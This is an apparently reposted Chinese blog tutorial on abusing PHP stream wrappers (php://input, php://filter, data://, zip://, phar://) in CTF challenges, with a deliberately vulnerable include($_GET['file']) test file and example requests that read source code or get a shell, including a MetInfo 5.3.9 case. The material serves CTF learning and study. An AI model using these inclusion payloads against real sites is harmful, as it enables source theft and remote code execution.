zoukankan      html  css  js  c++  java
  • ctf中常见的php伪协议应用

    ctf中常见的php伪协议应用

    转载:http://www.4o4notfound.org/index.php/archives/31/

    0x01 知识储备

    php支持的协议和封装协议可以看http://php.net/manual/zh/wrappers.php,大致有12种,总结了一些真实漏洞和ctf比赛中常出现的案例,发现其中用的最多的四种是:php://、data://、zlib://、phar://

    三个白帽
    payload:php://filter/write=convert.base64-decode/resource=shell.php
    bypass:死亡die,base64在解码时会忽略特殊字符
    
    pctf2016
    payload:data:text/plain;base64,MS50eHQ=
    bypass:stripos等if判断
    
    hctf2016+swpu2016
    payload1+payload2
    payload1:php://filter/convert.base64-encode/resource=../flag.php
    payload2:phar://xxx.jpg/shell
    
    西安华山杯2016
    payload:php://input
    payload:data:text/plain;base64,xxxx
    

    0x02 相关研究

    1)、php://
    这里分析常用到的php://input和php://filter.其中php://input要求"allow_url_include"设置为"On"
    写个测试文件test.php

    <?php
    include($_GET['file']);
    ?>
    

    本地测试发现一个有趣的现象(本地1.php文件内容为phpinfo())

    1、访问http://localhost:88/test.php?file=php://input
    POST:php://filter/read=convert.base64-encode/resource=1.php
    回显结果:php://filter/read=convert.base64-encode/resource=1.php
    POST:<?php phpinfo();?>
    回显结果:phpinfo()执行的结果
    
    2、访问http://localhost:88/test.php?file=php://filter/read=convert.base64-encode/resource=1.php 
    回显结果:PD9waHAgIA0KcGhwaW5mbygpOw0KPz4=
    
    3、访问http://localhost:88/test.php?file=php://filter//resource=1.php
    回显结果:phpinfo()执行的结果
    
    4、访问http://localhost:88/test.php?file=PD9waHAgIA0KcGhwaW5mbygpOw0KPz4=(可以是其他任意字符,这里我只是想和第二种情况好比较)
    回显结果:Warning: include(PD9waHAgIA0KcGhwaW5mbygpOw0KPz4=): failed to open stream: No such file or directory in C:phpStudyWWW	est.php on line 2
    

    为什么会出现四种不同的情况呢?我们可以把include()函数看成打开文件的file_get_contents()函数,当然又有所不同,include能解析php代码,重要的是两者共同的“流”的概念,这就解释了第四种include直接包含字符变量出现解析错误,因为没有“流”。。第一种有php://input流,相当于直接包含并尝试解析,如果能解析则解析,如果是变量,会不被解析直接回显,第二种有php://filter,可以看做经过过滤的流,读取1.php的内容,经过base64编码,然后include包含,可以看做include直接包含base64编码的变量,不被解析,直接回显,第三种相较于第二种,缺少了base64编码,include直接包含文件,读取该文件的内容并解析。

    综上所述,就是“流”+“字符变量”,include不解析直接输出字符变量,“流”+“php代码”,include会解析执行,没有“流”则失败

    2)、data://
    这里分析常用到的data:text/plain,xxxxxxx、data:text/plain;base64,xxxxxxx

    访问http://localhost:88/test.php?file=data:text/plain,<?php phpinfo();?>
    执行phpinfo
    访问http://localhost:88/test.php?file=data:text/plain,aaaaa
    输出aaaaa
    访问http://localhost:88/test.php?file=data:text/plain;base64,PD9waHAgIA0KcGhwaW5mbygpOw0KPz4=
    执行phpinfo
    访问http://localhost:88/test.php?file=data:text/plain;base64,aaaaaa
    输出aaaaaa base64解码后的内容
    

    如果用file_get_contents函数做测试的话,大多都和include函数相同,不同的就是php代码不能解析,直接输出

    3)、zlib://
    有一种用法是:zip://archive.zip#dir/file.txt
    找到一个真实漏洞:metinfo,版本大概是5.3.9
    参见cheery师傅的博客,metinfo 最新代码执行一枚(8月30日)
    漏洞成因:require_once $depth.'../include/captcha.class.php';变量$depth可控
    利用方式为:构造文件目录结构为"../include/captcha.class.php",内含shell的文件,(在linux下才可构造,win下文件名不能含特殊字符),然后压缩为zip包,再把zip后缀改为png并上传
    本地为了测试方便,修改为require_once $_GET['file'].'captcha.class.php';

    访问`http://localhost:88/test.php?file=zip://C:/phpStudy/WWW/test.jpg%23`即可getshell
    

    4)、phar://
    这种和zip伪协议差不多,用法有一点点区别一个是“#”,一个是“/”
    phar://archive.zip/dir/file.txt

    同理访问http://localhost:88/test.php?file=phar://C:/phpStudy/WWW/test.jpg/即可getshell
    

    0x03 应用场景

    php://input和data://可以用来绕过一些判断语句
    data://+include可以远程命令执行
    php://filter可以用来对磁盘读写,ctf中任意文件读取用的比较多,还有就是三个白帽挑战中的绕过死亡die
    zip://和phar://主要用于配合php://filter读源码审计上传拿getshell

    0x04再推荐几篇:

    http://www.4o4notfound.org/index.php/archives/31/
    https://www.cnblogs.com/LittleHann/p/3665062.html
    https://www.leavesongs.com/PENETRATION/php-filter-magic.html

  • 相关阅读:
    linux将命令添加到PATH中
    查看linux服务器时间
    spring参数校验及全局异常处理
    Https协议的工作过程
    反爬虫方式
    telnet进入某个端口后无法退出
    索引操作
    redis output buffer 设置太小导致oom
    mysql查询课程浏览记录表中最近一周浏览次数最多的课程
    C++ 读写注册表
  • 原文地址:https://www.cnblogs.com/v01cano/p/11795868.html
Copyright © 2011-2022 走看看